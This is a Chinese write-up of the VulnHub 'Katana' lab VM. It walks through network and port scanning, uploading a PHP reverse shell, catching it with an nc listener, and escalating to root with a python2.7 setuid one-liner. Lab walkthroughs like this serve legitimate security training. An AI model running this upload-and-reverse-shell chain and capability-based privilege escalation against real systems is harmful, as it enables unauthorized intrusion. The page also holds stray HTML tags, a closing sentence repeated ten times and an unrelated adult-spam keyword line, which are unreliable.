<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    vulnhub之katana的實踐

    VSole2023-07-24 09:41:01

    今天實踐的是vulnhub的katana鏡像,

    下載地址,https://download.vulnhub.com/katana/katana.zip,

    用workstation導入成功,

    做地址掃描,sudo netdiscover -r 192.168.177.0/24,

    獲取到靶機地址192.168.177.148,

    繼續做端口掃描,sudo nmap -sS -sV -T5 -A -p- 192.168.177.148,

    8088端口有web服務,做html路徑掃描,

    dirb http://192.168.177.148:8088/ -X .html,

    獲取到http://192.168.177.148:8088/upload.html,瀏覽器訪問,

    在kali攻擊機上準備php-reverse-shell.php文件,上傳,

    kali攻擊機上準備好反彈shell監聽,nc -lvp 4444,

    瀏覽器訪問http://192.168.177.148:8715/katana_php-reverse-shell.php,獲取到了反彈shell,

    不是root,需要提權,

    搜索設置了capabilities的可執行文件,getcap -r / 2>/dev/null,

    用python2.7進行提權,

    /usr/bin/python2.7 -c 'import os; os.setuid(0); os.system("/bin/bash")',

    id確認是root,

    本周的技術實踐到此結束,本周的技術實踐到此結束,本周的技術實踐到此結束,本周的技術實踐到此結束,本周的技術實踐到此結束,本周的技術實踐到此結束,本周的技術實踐到此結束,本周的技術實踐到此結束,本周的技術實踐到此結束,本周的技術實踐到此結束。

    武士刀
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类